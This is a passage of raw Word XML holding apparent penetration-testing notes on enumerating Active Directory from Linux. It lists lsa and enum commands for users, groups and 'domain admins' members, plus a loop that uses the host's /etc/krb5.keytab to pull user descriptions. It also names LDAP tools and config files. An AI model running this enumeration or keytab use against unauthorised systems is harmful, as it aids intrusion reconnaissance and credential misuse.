          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D06912" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>#Get basic metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665BAD7B" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./get-metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661B2EA2" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./lsa get-metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD8ECB8" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFE2FF4" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>#Get users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318266B4" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./enum-users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AAD0AB" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./lsa enum-users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1422B0" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05838971" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>#Get groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C5CD0" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./enum-groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C16A36" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./lsa enum-groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17145A82" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E0EC3F" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>#Get all kind of objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D3E2A7" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./enum-objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AACD84" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./lsa enum-objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539B138D" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F49EFEB" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>#Get groups of a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5286198F" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./list-groups-for-user &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8F6148" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./lsa list-groups-for-user &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0093FB4D" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>#Get groups of each user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481C5B11" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DE6775" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2933AF00" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>#Get users of a group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECD4F05" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./enum-members --by-name "domain admins"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655D5040" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./lsa enum-members --by-name "domain admins"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DC947F" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>#Get users of each group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74399F87" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AA049D" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527FDD91" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>#Get description of each user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E63D80C" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n &lt;Username&gt; | grep "CN" | while read line; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27640C11" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">    echo "$line";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442FBB7F" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">    ./adtool --keytab=/etc/krb5.keytab -n &lt;username&gt; -a lookup-object --dn="$line" --attr "description";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7638D060" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">    echo "======================"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298C74E" w14:textId="7C9ED986" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB15F93" w14:textId="77777777" w:rsidR="000609D7" w:rsidRDefault="000609D7" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A780F8" w14:textId="24A0EA31" w:rsidR="0002143A" w:rsidRDefault="0002143A" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Graphical Interface for LDAP servers: </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="00F00915" w:rsidRPr="00DC2AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>http://www.jxplorer.org/downloads/users.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="550DB418" w14:textId="4A4D3CF8" w:rsidR="00F00915" w:rsidRDefault="00F00915" w:rsidP="00F00915">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Could also utilize Apache Directory</w:t>
      </w:r>
      <w:r w:rsidR="00920B97">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="003206E6" w:rsidRPr="00DC2AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://directory.apache.org/studio/download/download-linux.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43E8C75B" w14:textId="346D6A35" w:rsidR="003206E6" w:rsidRDefault="003206E6" w:rsidP="00B9353F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3728E0D1" w14:textId="13CE201E" w:rsidR="00B9353F" w:rsidRDefault="00B9353F" w:rsidP="00B9353F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Kerberos Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B625A57" w14:textId="08A5E269" w:rsidR="00B9353F" w:rsidRDefault="00B9353F" w:rsidP="00B9353F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Using ldapsearch can allow you to authenticate against Kerberos instead of via NTLM by using the parameter “-Y GSSAPI”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1D00AE" w14:textId="77777777" w:rsidR="00B9353F" w:rsidRDefault="00B9353F" w:rsidP="00B9353F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54353F7D" w14:textId="3353E4E9" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Some Config Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D18D75" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>General</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172C7C53" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>containers.ldif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA462F" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldap.cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F533E3C" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldap.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7787505F" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldap.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D233EC8" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldap-config.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2C3248" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ldap-realm.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7691D3C3" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>slapd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5375D75A" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>IBM SecureWay V3 server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD366BE" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>V3.sas.oc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B197910" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Microsoft Active Directory server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B464656" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>msadClassesAttrs.ldif</w:t>
      </w:r>
